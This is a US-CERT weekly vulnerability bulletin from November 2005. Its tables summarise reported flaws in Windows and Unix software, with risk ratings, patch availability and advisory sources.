Summary of Security Items from November 2 through November 8, 2005
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
Information in the US-CERT Cyber Security Bulletin is a compilation and includes information published by outside sources, therefore the information should not be considered the result of US-CERT analysis. Software vulnerabilities are categorized in the appropriate section reflecting the operating system on which the vulnerability was reported; however, this does not mean that the vulnerability only affects the operating system reported since this information is obtained from open-source information.
This bulletin provides a summary of new or updated vulnerabilities, exploits, trends, viruses, and trojans. Updates to vulnerabilities that appeared in previous bulletins are listed in bold text. The text in the Risk column appears in red for vulnerabilities ranking High. The risks levels applied to vulnerabilities in the Cyber Security Bulletin are based on how the "system" may be impacted. The Recent Exploit/Technique table contains a "Workaround or Patch Available" column that indicates whether a workaround or patch has been published for the vulnerability which the script exploits.
Vulnerabilities
The table below summarizes vulnerabilities that have been identified, even if they are not being exploited. Complete details about patches or workarounds are available from the source of the information or from the URL provided in the section. CVE numbers are listed where applicable. Vulnerabilities that affect both Windows and Unix Operating Systems are included in the Multiple Operating Systems section.
Note: All the information included in the following tables has been discussed in newsgroups and on web sites.
The Risk levels defined below are based on how the system may be impacted:
Note: Even though a vulnerability may allow several malicious acts to be performed, only the highest level risk will be defined in the Risk column.
- High - A high-risk vulnerability is defined as one that will allow an intruder to immediately gain privileged access (e.g., sysadmin or root) to the system or allow an intruder to execute code or alter arbitrary system files. An example of a high-risk vulnerability is one that allows an unauthorized user to send a sequence of instructions to a machine and the machine responds with a command prompt with administrator privileges.
- Medium - A medium-risk vulnerability is defined as one that will allow an intruder immediate access to a system with less than privileged access. Such vulnerability will allow the intruder the opportunity to continue the attempt to gain privileged access. An example of medium-risk vulnerability is a server configuration error that allows an intruder to capture the password file.
- Low - A low-risk vulnerability is defined as one that will provide information to an intruder that could lead to further compromise attempts or a Denial of Service (DoS) attack. It should be noted that while the DoS attack is deemed low from a threat potential, the frequency of this type of attack is very high. DoS attacks against mission-critical nodes are not included in this rating and any attack of this nature should instead be considered to be a "High" threat.
| Windows Operating Systems Only | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attack Scripts | Common Name / CVE Reference | Risk | Source |
| ASP Knowledgebase | A vulnerability has been reported in ASPKnowledgebase that could let remote malicious users perform SQL injection. No workaround or patch available at time of publishing. There is no exploit code required. | ASP Knowledgebase SQL Injection Vulnerability | Medium | Security Focus, ID: 15364, November 9, 2005 |
| FileZilla Server Terminal 0.4.9d | A buffer overflow vulnerability has been reported in FileZilla that could let remote malicious users obtain elevated privileges or execute arbitrary code. No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability. | FileZilla Server Terminal Privilege Elevation or Arbitrary Code Execution | High | Security Focus, ID: 15346, November 7, 2005 |
WhatsUp Small Business 2004 | An input validation vulnerability has been reported in WhatsUp Small Business that could let remote malicious users to traverse directories and disclose information. No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | WhatsUp Small Business Directory Traversal and Information Disclosure | Medium | Security Tracker, Alert ID: 1015141, November 3, 2005 |
DirectX DirectShow 7.0 to 9.0c | A buffer overflow vulnerability has been reported in DirectX DirectShow that could let remote malicious users execute arbitrary code. Vendor fix available: Avaya: V1.3 Updated to note availability of Microsoft Knowledge Base Article 909596 and to clarify an issue affecting Windows 2000 SP4 customers, also updates of file versions. V1.4 Updated to note complications of the DirectX 8.1 update on machines running DirectX 9. Currently we are not aware of any exploits for this vulnerability. | Microsoft DirectX DirectShow Arbitrary Code Execution | High | Microsoft, Security Bulletin MS05-050, October 11, 2005 Technical Cyber Security Alert TA05-284A, October 11, 2005 Avaya, ASA-2005-214, October 11, 2005 Microsoft, Security Bulletin MS05-050 V1.3, October 21, 2005 Microsoft, Security Bulletin MS05-050 V1.4, November 9, 2005 |
Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Server | A vulnerability has been reported that could let remote malicious users cause a Denial of Service. This is due to an error when processing EMF (Microsoft Enhanced Metafile) files in the Vendor solution available: Proof of Concept exploits have been published. | Microsoft Windows EMF File Denial of Service Vulnerability | Low | Secunia SA14631, March 18, 2005 Security Focus, ID: 12834, November 9, 2005 Microsoft, Security Bulletin MS05-053, November 8, 2005 |
Windows Graphics Rendering Engine | A buffer overflow vulnerability has been reported in Windows Graphics Rendering Engine that could let local or remote malicious users execute arbitrary code. Vendor solution available: Currently we are not aware of any exploits for this vulnerability. | Microsoft Windows Graphics Rendering Engine Arbitrary Code Execution CVE-2005-2123 | High | Security Tracker, Alert ID: 1015168, November 8, 2005 Microsoft, Security Bulletin MS05-053, November 8, 2005 |
Windows Kerberos PKINT
| Multiple vulnerabilities have been reported in Windows Kerberos PKINT that could let remote malicious users disclose information or cause a Denial of Service. Vendor fix available: Currently we are not aware of any exploits for this vulnerability. | Microsoft Windows Kerberos PKINIT Information Disclosure or Denial of Service | Low | Microsoft Security Bulletin MS05-042, August 9, 2005 |
Calendar Manager Pro 1.0, 1.0.1 | A vulnerability has been reported in Calendar Manager Pro that could let remote malicious users to bypass authentication. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | Ocean12 Calendar Manager Pro Authentication Bypassing | Medium | Security Focus, ID: 15329, November 4, 2005 |
| UNIX / Linux Operating Systems Only | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attack Scripts | Common Name / CVE Reference | Risk | Source |
Apache 2.0.x | A vulnerability has been reported in 'modules/ssl/ssl_engine_ Patch available at: OpenPKG: RedHat: Ubuntu: SGI: Debian: Mandriva: Slackware: Trustix: Debian: Gentoo: Avaya: Conectiva: TurboLinux: Trustix: RedHat: There is no exploit code required. | Apache 'Mod_SSL SSLVerifyClient' Restriction Bypass | Medium | Security Tracker Alert ID: 1014833, September 1, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.017, September 3, 2005 RedHat Security Advisory, RHSA-2005:608-7, September 6, 2005 Ubuntu Security Notice, USN-177-1, September 07, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Debian Security Advisory, DSA 805-1, September 8, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:161, September 8, 2005 Slackware Security Advisory, SSA:2005-251-02, September 9, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0047, September 9, 2005 Debian Security Advisory DSA 807-1, September 12, 2005 Gentoo Linux Security Advisory, GLSA 200509-12, September 19, 2005 Avaya Security Advisory, ASA-2005-204, September 23, 2005 Conectiva Linux Announcement, CLSA-2005:1013, September 27, 2005 Turbolinux Security Advisory, TLSA-2005-94, October 3, 2005 HP Security Bulletin, Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 RedHat Security Advisory, RHSA-2005:816-10, November 2, 2005 |
Asterisk@Home 2.0 -beta4, 1.5, Asterisk 1.2 .0-beta1, 1.0.9, 1.0.8, 1.0.7, 0.9 .0, 0.7-0.7.2, 0.4, 0.3, 0.2, 0.1.7-0.1.9 -1 | A vulnerability has been reported in 'vmail.cgi' due to insufficient sanitization of the 'folder' parameter, which could let a remote malicious user obtain unauthorized access. Upgrades available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | Asterisk Voicemail Unauthorized Access | Medium | Assurance. com.au Vulnerability Advisory, November 7, 2005 |
linux-ftpd-ssl 0.17 | A buffer overflow vulnerability has been reported in the 'vsprintf()' function in the FTP server, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. An exploit script has been published. | Linux-FTPD-SSL FTP Server Remote Buffer Overflow | High | Secunia Advisory: SA17465, November 8, 2005 |
cPanel 10.6 .0-R137, 10.2 .0-R82 | A Cross-Site Scripting vulnerability has been reported in the Entropy Chat script due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | cPanel Cross-Site Scripting | Medium | Secunia Advisory: SA16609, November 4, 2005 |
horde 3.0.4 | A vulnerability has been reported because the default Horde3 installation for Debian has a blank administrator password, which could let a local/remote malicious user obtain administrative access. Upgrade available at: There is no exploit code required. | Debian Horde Default Administrator Password | High | Debian Security Advisory, DSA 884-1, November 7, 2005 |
eric3 prior to 3.7.2 | A vulnerability has been reported due to a "potential security exploit." The impact was not specified
Upgrades available at: Debian: SUSE: Currently we are not aware of any exploits for this vulnerability. | eric3 Unspecified Vulnerability | Not Specified | Security Tracker Alert ID: 1014947, September 21, 2005 Debian Security Advisory, DSA 869-1, October 21, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
ELM 2.5.5-2.5.7
| A buffer overflow vulnerability has been reported due to insufficient parsing of SMTP 'Expires' header lines, which could let a remote malicious user execute arbitrary code. Update to Elm 2.5 PL8 available at: RedHat: Slackware: A Proof of Concept exploit script has been published. | Elm 'Expires' Header Remote Buffer Overflow | High | Security Tracker Alert ID: 1014745, August 20, 2005 RedHat Security Advisory, RHSA-2005:755-07, August 23, 2005 Slackware Security Advisory, SSA:2005-311-01, November 8, 2005 |
Fetchmail 6.x | A vulnerability has been reported in the 'fetchmailconf' configuration utility due to a race condition, which could let a malicious user obtain sensitive information. Upgrades available at: http://download. Gentoo: Ubuntu: There is no exploit code required. | Fetchmail 'fetchmailconf' Information Disclosure | Medium | fetchmail-SA-2005-02 Security Announcement, October 21, 2005 Gentoo Linux Security Advisory, GLSA 200511-06, November 6, 2005 Ubuntu Security Notice, USN-215-1, November 07, 2005 |
Internet Gatekeeper for Linux, | A vulnerability has been reported because certain CGI scripts that have world-executable permissions and set user id (setuid) permissions can be invoked by a malicious user to obtain root privileges. Fix available at: There is no exploit code required; however, a Proof of Concept exploit script has been published. | F-Secure Anti-Virus Gatekeeper &Gateway for Linux Elevated Privileges | High | F-Secure Security Bulletin FSC-2005-3, November 7, 2005 |
Gallery 1.5 1.4 -1.4.4 -pl5 | A vulnerability has been reported in 'classes/postnuke0.7.1/ Upgrades available at: Debian: There is no exploit code required. | Medium | Secunia Advisory: SA16389, August 11, 2005 Debian Security Advisory, DSA 879-1, November 2, 2005 | |
Gentoo Linux | Vulnerabilities have been reported in multiple packages in Gentoo Linux due to an insecure RUNPATH vulnerability, which could let a malicious user obtain elevated privileges.
Gentoo: Gentoo: There is no exploit code required. | Gentoo Linux Multiple Packages Insecure RUNPATH | Medium | Gentoo Linux Security Advisory, GLSA 200510-14, October 17, 2005 Gentoo Linux Security Advisory, GLSA 200511-02, November 2, 2005 |
GpsDrive 2.0 9 | A format string vulnerability has been reported in 'Friendsd,' which could let a remote malicious user execute arbitrary code. Debian: Proof of Concept exploits have been published. | GpsDrive Remote Format String | High | Security Focus, Bugtraq ID: 15319, November 4, 2005 Debian Security Advisory, DSA 891-1, November 9, 2005 |
HP-UX 11.0 4, 11.0, 10.20, B.11.11, B.11.04, B.11.00 | A vulnerability was reported because remote malicious authenticated users can send specially crafted data to list directories with root privileges. Updates available at: There is no exploit code required; however, a Proof of Concept exploit script has been published. | HP-UX ftpd LIST Command Information Disclosure | Medium | HP Security Advisory, HPSBUX 02071, November 6, 2005 |
HP-UX B.11.00, B.11.11 | A vulnerability has been reported in 'envd' due to an unspecified error, which could let a remote malicious user execute arbitrary code and/or obtain elevated privileges. Patches available at: http://itrc.hp.com Currently we are not aware of any exploits for this vulnerability. | HP-UX 'envd' Arbitrary Code Execution or Elevated Privileges | High | HP Security Bulletin, HPSBUX 02073, November 9, 2005 |
HP-UX B.11.00, B.11.11, B.11.23 | A vulnerability has been reported in 'remshd' due to an unspecified error on systems running in Trusted Mode, which could let a remote malicious user obtain unauthorized access. Patches available at: http://itrc.hp.com Currently we are not aware of any exploits for this vulnerability. | HP-UX Trusted Mode 'remshd' Remote Unauthorized Access | Medium | HP Security Bulletin, HPSBUX 02072, November 9, 2005 |
AIX 5.2.2, 5.2L, 5.2 | A buffer overflow vulnerability has been reported in 'SWCONS' command due to a boundary error. The impact was not specified. Update information available at: Currently we are not aware of any exploits for this vulnerability. | IBM AIX SWCONS Local Buffer Overflow | Not Specified | IBM Advisory, IY78467, November 3, 2005 |
CHM lib 0.35, 0.3- 0.33, 0.2, 0.1 | A buffer overflow vulnerability has been reported in '_chm_ Upgrades available at: Debian: Currently we are not aware of any exploits for this vulnerability. | Jed Wing CHM Lib '_chm_find_ | High | iDefense Security Advisory, October 28, 2005 Debian Security Advisory, DSA 886-1, November 7, 2005 |
CHM lib 0.36, 0.35, 0.3-0.33, 0.2, 0.1 | A buffer overflow vulnerability has been reported in the '_chm_decompress_block()' function due to a boundary error when reading input, which could let a remote malicious user execute arbitrary code. Upgrades available at: SUSE: Debian: Currently we are not aware of any exploits for this vulnerability. | CHM Lib Remote Buffer Overflow | High | Security Focus, Bugtraq ID: 15211, October 26, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Debian Security Advisory, DSA 886-1, November 7, 2005 |
KOffice 1.4.1, 1.4, 1.3-1.3.5, 1.2.1, 1.2 | A buffer overflow vulnerability has been reported when handling a malformed RTF file, which could let a remote malicious user execute arbitrary code. Upgrades available at: Patches available at: Ubuntu: Gentoo: Ubuntu: Fedora: Mandriva: Debian: SUSE: Slackware: Conectiva: Currently we are not aware of any exploits for this vulnerability. | KDE KOffice KWord RTF Remote Buffer Overflow | High | Security Focus, Bugtraq ID: 15060, October 11, 2005 Ubuntu Security Notice, USN-202-1, October 12, 2005 Gentoo Linux Security Advisory, GLSA 200510-12, October 12, 2005 Fedora Update Notification, Mandriva Linux Security Update Advisory, MDKSA-2005:185, October 14, 2005 Debian Security Advisory, DSA 872-1, October 26, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-02, November 7, 2005 Conectiva Security Announce-ment, CLSA-2005:1042, November 7, 2005 |
lm_sensors 2.9.1 | A vulnerability has been reported in the 'pwmconfig' script due to the insecure creation of temporary files, which could result in a loss of data or a Denial of Service. Ubuntu: Mandriva: Gentoo: Debian: Conectiva: Fedora: There is no exploit code required. | LM_sensors PWMConfig Insecure Temporary File Creation | Low | Security Focus, Bugtraq ID: 14624, August 22, 2005 Ubuntu Security Notice, USN-172-1, August 23, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:149, August 25, 2005 Gentoo Linux Security Advisory, GLSA 200508-19, August 30, 2005 Debian Security Advisory, DSA 814-1, September 15, 2005 Conectiva Linux Announce- Fedora Update Notifications, |
ClamAV 0.80-0.87, 0.75.1, 0.70, 0.68, 0.65, 0.60, 0.51-0.54 | Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in 'libclamav/fsg.c' due to a boundary error when unpacking FSG v1.33 compressed executable files, which could let a remote malicious user execute arbitrary code; a remote Denial of Service vulnerability was reported in 'libclamav/tnef.c' due to a validation error when handling a CAB file that contains a malformed header; a remote Denial of Service vulnerability was reported in 'libclamav/ Upgrades available at: Debian: Gentoo: Mandriva: Currently we are not aware of any exploits for these vulnerabilities. | Clam AntiVirus Remote Denial of Service & Arbitrary Code Execution | High | Security Tracker Alert ID: 1015154, November 4, 2005 Debian Security Advisory DSA 887-1, November 7, 2005 Gentoo Linux Security Advisory, GLSA 200511-04, November 7, 2005 Mandriva Linux Security Advisory, MDKSA-2005:205, November 7, 2005 |
ht//Dig Group ht://Dig 3.1.5 -8, 3.1.5 -7, 3.1.5, 3.1.6, 3.2 .0, 3.2 0b2-0b6; SuSE Linux 8.0, i386, 8.1, 8.2, 9.0, 9.0 x86_64, 9.1, 9.2 | A Cross-Site Scripting vulnerability exists due to insufficient filtering of HTML code from the 'config' parameter, which could let a remote malicious user execute arbitrary HTML and script code. SuSE: Debian: Gentoo: Mandrake:
href="http://www.mandrakesecure.net/en/ftp.php"> Fedora: SCO: Proof of Concept exploit has been published. | ht://Dig | High | SUSE Security Summary Report, SUSE-SR:2005:003, February 4, 2005 Debian Security Advisory, DSA 680-1, February 14, 2005 Gentoo Linux Security Advisory, GLSA 200502-16, Mandrakelinux Security Update Advisory, Fedora Update Notification, SCO Security Advisory, SCOSA-2005.46, November 2, 2005 |
Jed Wing CHM lib 0.35-0.37, 0.3-0.33, 0.2, 0.1; | A buffer overflow vulnerability has been reported in the LZX decompression method, which could possibly let a remote malicious user execute arbitrary code. Upgrade available at: Debian: Currently we are not aware of any exploits for this vulnerability. | Jed Wing CHM Lib LZX Decompression Method Buffer Overflow | High | Debian Security Advisory DSA 886-1, November 7, 2005 |
OpenBSD 3.0-3.7, 2.0-2.9; Keith Muller pax | A vulnerability has been reported when an archive is extracted into a world or group writeable directory, which could let a malicious user modify file permissions. OpenBSD: There is no exploit code required; | Pax File Permission Modification Race Condition | Medium | Security Focus, Bugtraq ID: 15262, November 1, 2005 |
Squid Web Proxy Cache 2.5 .STABLE3-STABLE10, STABLE1 | A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences. Upgrades available at: Ubuntu: Debian: Mandriva: SCO: SUSE: Currently we are not aware of any exploits for this vulnerability. | Squid NTLM Authentication Remote Denial of Service | Low | Secunia Advisory: SA16992, September 30, 2005 Ubuntu Security Notice, USN-192-1, September 30, 2005 Debian Security Advisory, DSA 828-1, September 30, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
zlib 1.2.2, 1.2.1, 1.2 .0.7, 1.1-1.1.4, 1.0-1.0.9; Ubuntu Linux 5.0 4, powerpc, i386, amd64, 4.1 ppc, ia64, ia32; SuSE Open-Enterprise-Server 9.0, Novell Linux Desktop 9.0, Linux Professional 9.3, x86_64, 9.2, x86_64, 9.1, x86_64, Linux Personal 9.3, x86_64, 9.2, x86_64, 9.1, x86_64, Linux Enterprise Server 9; Gentoo Linux; | A buffer overflow vulnerability has been reported due to insufficient validation of input data prior to utilizing it in a memory copy operation, which could let a remote malicious user execute arbitrary code. Debian: FreeBSD: Gentoo: SUSE: Ubuntu: Mandriva: OpenBSD: OpenPKG: RedHat: Trustix: Slackware: TurboLinux: Fedora: zsync: Apple: SCO: IPCop: Debian: Trolltech: FedoraLegacy: Gentoo: Gentoo: Debian: Trustix: Sun: Mandriva: Ubuntu: Ubuntu: Currently we are not aware of any exploits for this vulnerability. | Zlib Compression Library Buffer Overflow | High | Debian Security Advisory FreeBSD Security Advisory, Gentoo Linux Security Advisory, GLSA 200507- SUSE Security Announcement, SUSE-SA:2005:039, Ubuntu Security Notice, RedHat Security Advisory, RHSA-2005:569-03, Fedora Update Notifications, Mandriva Linux Security Update Advisory, OpenPKG Trustix Secure Slackware Security Turbolinux Security Fedora Update Notification, FEDORA-2005-565, July 13, 2005 SUSE Security Summary Security Focus, 14162, July 21, 2005 USCERT Vulnerability Note VU#680620, July 22, 2005 Apple Security Update 2005-007, SCO Security Advisory, SCOSA-2005.33, August 19, 2005 Security Focus, Bugtraq ID: 14162, August 26, 2005 Debian Security Advisory, DSA 797-1, September 1, 2005 Security Focus, Bugtraq ID: 14162, September 12, 2005 Fedora Legacy Update Advisory, FLSA:162680, September 14, 2005 Gentoo Linux Security Advisory, GLSA 200509-18, September 26, 2005 Debian Security Advisory, DSA 797-2, September 29, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0055, October 7, 2005 Sun(sm) Alert Notification Mandriva Linux Security Advisory MDKSA-2005:196, October 26, 2005 Ubuntu Security Notice, USN-151-3, October 28, 2005 Ubuntu Security Notice, USN-151-4, November 09, 2005 |
zlib 1.2.2, 1.2.1; Ubuntu Linux 5.04 powerpc, i386, amd64, | A remote Denial of Service vulnerability has been reported due to a failure of the library to properly handle unexpected compression routine input. Zlib: Debian: Ubuntu: OpenBSD: Mandriva: Fedora: Slackware: FreeBSD: SUSE: Gentoo: http://security.gentoo. Trustix: Conectiva: Apple: TurboLinux: SCO: Debian: Trolltech: FedoraLegacy: Debian: Mandriva: Ubuntu: Ubuntu: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor Zlib Compression Library Decompression Remote Denial of Service | Low | Security Focus, Bugtraq ID 14340, July 21, 2005 Debian Security Advisory DSA 763-1, July 21, 2005 Ubuntu Security Notice, USN-151-1, July 21, 2005 OpenBSD, Release Errata 3.7, July 21, 2005 Mandriva Security Advisory, MDKSA-2005:124, July 22, 2005 Secunia, Advisory: SA16195, July 25, 2005 Slackware Security Advisory, SSA:2005- FreeBSD Security Advisory, SA-05:18, July 27, 2005 SUSE Security Announce- Gentoo Linux Security Advisory, GLSA 200507-28, July 30, 2005 Gentoo Linux Security Advisory, GLSA 200508-01, August 1, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0040, August 5, 2005 Conectiva Linux Announcement, CLSA-2005:997, August 11, 2005 Apple Security Update, APPLE-SA-2005-08-15, August 15, 2005 Turbolinux Security Advisory, TLSA-2005-83, August 18, 2005 SCO Security Advisory, SCOSA-2005.33, August 19, 2005 Debian Security Advisory, DSA 797-1, September 1, 2005 Security Focus, Bugtraq ID: 14340, September 12, 2005 Fedora Legacy Update Advisory, FLSA:162680, September 14, 2005 Debian Security Advisory, DSA 797-2, September 29, 2005 Mandriva Linux Security Advisory, MDKSA-2005:196, October 26, 2005 Ubuntu Security Notice, USN-151-3, October 28, 2005 Ubuntu Security Notice, USN-151-4, November 09, 2005 |
Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha, 3.0, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, alpha; | A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user overwrite arbitrary files. Debian: There is no exploit code required. | Acme Thttpd Insecure Temporary File Creation | Medium | Debian Security Advisory DSA 883-1, November 4, 2005 |
Gnome-DB libgda 1.2.1; | Format string vulnerabilities have been reported in 'gda-log.c' due to format string errors in the 'gda_log_error()' and 'gda_ Debian: Ubuntu: Mandriva: Gentoo: SUSE: Fedora: Currently we are not aware of any exploits for these vulnerabilities. | GNOME-DB | High | Security Focus, Bugtraq ID: 15200, October 25, 2005 Debian Security Advisory, Ubuntu Security Notice, USN-212-1, October 28, 2005 Mandriva Linux Security Advisory, MDKSA-2005:203, November 1, 2005 Gentoo Linux Security Advisory, GLSA 200511-01, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Fedora Update Notification, |
GNU gnump3d 2.9-2.9.5; | A vulnerability has been reported in GNUMP3d that could let remote malicious users conduct Cross-Site Scripting or traverse directories. Upgrade to version 2.9.6:
href="http://savannah.gnu.org/download/gnump3d/gnump3d-2.9.6.tar.gz"> Debian: SUSE: Gentoo: There is no exploit code required; however, Proof of Concept exploits have been published. | GNUMP3d Cross-Site Scripting or Directory Traversal | Medium | Security Focus Bugtraq IDs: 15226 & 15228, October 28, 2005 Debian Security Advisory DSA 877-1, October 28, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Gentoo Linux Security Advisory, GLSA 200511-05, November 6, 2005 |
GNU gnump3d 2.9-2.9.5; | A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: Gentoo: There is no exploit code required. | GNU gnump3d Unspecified Cross-Site Scripting | Medium | Gentoo Linux Security Advisory GLSA 200511-05, November 7, 2005 |
Linux kernel 2.6-2.6.14 | A Denial of Service vulnerability has been in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/.' Upgrades available at: There is no exploit code required. | Linux Kernel 'Sysctl' Denial of Service | Low | Secunia Advisory: SA17504, November 9, 2005 |
MandrakeSoft Multi Network Firewall 2.0, Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0; | A buffer overflow vulnerability has been reported due to insufficient validation of user-supplied NTLM user name data, which could let a remote malicious user execute arbitrary code. WGet: Daniel Stenberg: Mandriva: Ubuntu: Fedora: Trustix: Gentoo: RedHat: http://rhn.redhat. SUSE: Slackware: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor WGet/Curl NTLM Username Buffer Overflow | High | Security Tracker Alert ID: 1015056, October 13, 2005 Mandriva Linux Security Update Advisories, MDKSA-2005:182 & 183, October 13, 200 Ubuntu Security Notice, USN-205-1, October 14, 2005 Fedora Update Notifications Fedora Update Notification, Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 Gentoo Linux Security Advisory. GLSA 200510-19, October 22, 2005 RedHat Security Advisories, RHSA-2005:807-6 & RHSA-2005:812-5, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-01, November 7, 2005 |
RedHat Enterprise Linux WS 4, WS 3, 2.1, IA64, ES 4, ES 3, 2.1, IA64, AS 4, AS 3, AS 2.1, IA64, Desktop 4.0, 3.0, Advanced Workstation for the Itanium Processor 2.1, IA64; OpenSSL Project OpenSSL 0.9.3-0.9.8, 0.9.2 b, 0.9.1 c; FreeBSD 6.0 -STABLE, -RELEASE, 5.4 -RELENG, -RELEASE, 5.3 -STABLE, -RELENG, -RELEASE, 5.3, 5.2.1 -RELEASE, -RELENG, 5.2 -RELEASE, 5.2, 5.1 -RELENG, -RELEASE/Alpha, 5.1 -RELEASE-p5, -RELEASE, 5.1, 5.0 -RELENG, 5.0, 4.11 -STABLE, -RELENG, 4.10 -RELENG, -RELEASE, 4.10 | A vulnerability has been reported due to the implementation of the 'SSL_OP_MSIE_ SSLV2_RSA_PADDING' option that maintains compatibility with third party software, which could let a remote malicious user bypass security. OpenSSL: FreeBSD: RedHat: Mandriva: Gentoo: Slackware: Fedora: Sun: Ubuntu: OpenPKG: SUSE: Trustix: SGI: Debian: NetBSD: BlueCoat Systems: Debian: Currently we are not aware of any exploits for this vulnerability. | Multiple Vendors OpenSSL Insecure Protocol Negotiation | Medium | OpenSSL Security Advisory, October 11, 2005 FreeBSD Security Advisory, FreeBSD-SA-05:21, October 11, 2005 RedHat Security Advisory, RHSA-2005:800-8, October 11, 2005 Mandriva Security Advisory, MDKSA-2005:179, October 11, 2005 Gentoo Linux Security Advisory, GLSA 200510-11, October 12, 2005 Slackware Security Advisory, SSA:2005-286-01, October 13, 2005 Fedora Update Notifications, Sun(sm) Alert Notification Ubuntu Security Notice, USN-204-1, October 14, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.022, October 17, 2005 SUSE Security Announcement, SUSE-SA:2005:061, October 19, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 SGI Security Advisory, 20051003-01-U, October 26, 2005 Debian Security Advisory DSA 875-1, October 27, 2005 NetBSD Security Update, November 1, 2005 BlueCoat Systems Advisory, November 3, 2005 Debian Security Advisory, DSA 888-1, November 7, 2005 |
RedHat Enterprise Linux WS 4, WS 3, WS 2.1, IA64, ES 4, ES 3, ES 2.1, IA64, AS 4, AS 3, 2.1, IA64, Desktop 4.0, 3.0, Advanced Workstation for the Itanium Processor 2.1, IA64; | Several vulnerabilities have been reported: a remote Denial of Service vulnerability was reported due to a NULL pointer dereferencing error; and a vulnerability was reported due to a boundary error that causes an out-of-bounds memory access, which could let a remote malicious user cause a Denial of Service and potentially execute arbitrary code. Upgrades available at: Fedora: Gentoo: RedHat: SUSE: Ubuntu: Debian: Currently we are not aware of any exploits for these vulnerabilities. | Multiple Vendors libungif GIF File Handling | High | Security Tracker Alert ID: 1015149, November 3, 2005 Fedora Update Notifications, Gentoo Linux Security Advisory GLSA 200511-03, November 4, 2005 RedHat Security Advisory, RHSA-2005: SUSE Security Summary Report, Ubuntu Security Notice, USN-214-1, November 07, 2005 Debian Security Advisory, DSA 890-1, November 9, 2005 |
RedHat Fedora Core3; Ubuntu Linux 4.1 ppc, ia64, ia32; | A vulnerability has been reported in xntpd when started using the '-u' option and the group is specified by a string, which could let a malicious user obtain elevated privileges. Upgrade available at: Ubuntu: Debian: Mandriva: Conectiva: NetBSD: There is no exploit code required. | XNTPD Insecure Privileges | Medium | Fedora Update Notification, Ubuntu Security Notice, USN-175-1, September 01, 2005 Debian Security Advisory, DSA 801-1, September 5, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:156, September 6, 2005 Conectiva Linux Announcement, CLSA-2005:1029, October 11, 2005 NetBSD Security Advisory 2005-011, November 2, 2005 |
shadow shadow 4.0.3; | A vulnerability has been reported in the setuid 'chfn' program due to insufficient argument checking when changing the GECOS field, which could let a malicious user obtain ROOT access.
SUSE: An exploit script has been published. | Multiple Vendors CHFN User Modification ROOT Access | High | SUSE Security Announce- ment, SUSE-SA:2005:064, November 4, 2005 |
XMail 1.21, 1.0; | A buffer overflow vulnerability has been reported in certain uses of the 'readdir_r' function, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor 'ReadDir_R' Buffer Overflow | High | Security Focus, Bugtraq ID: 15259, November 1, 2005 |
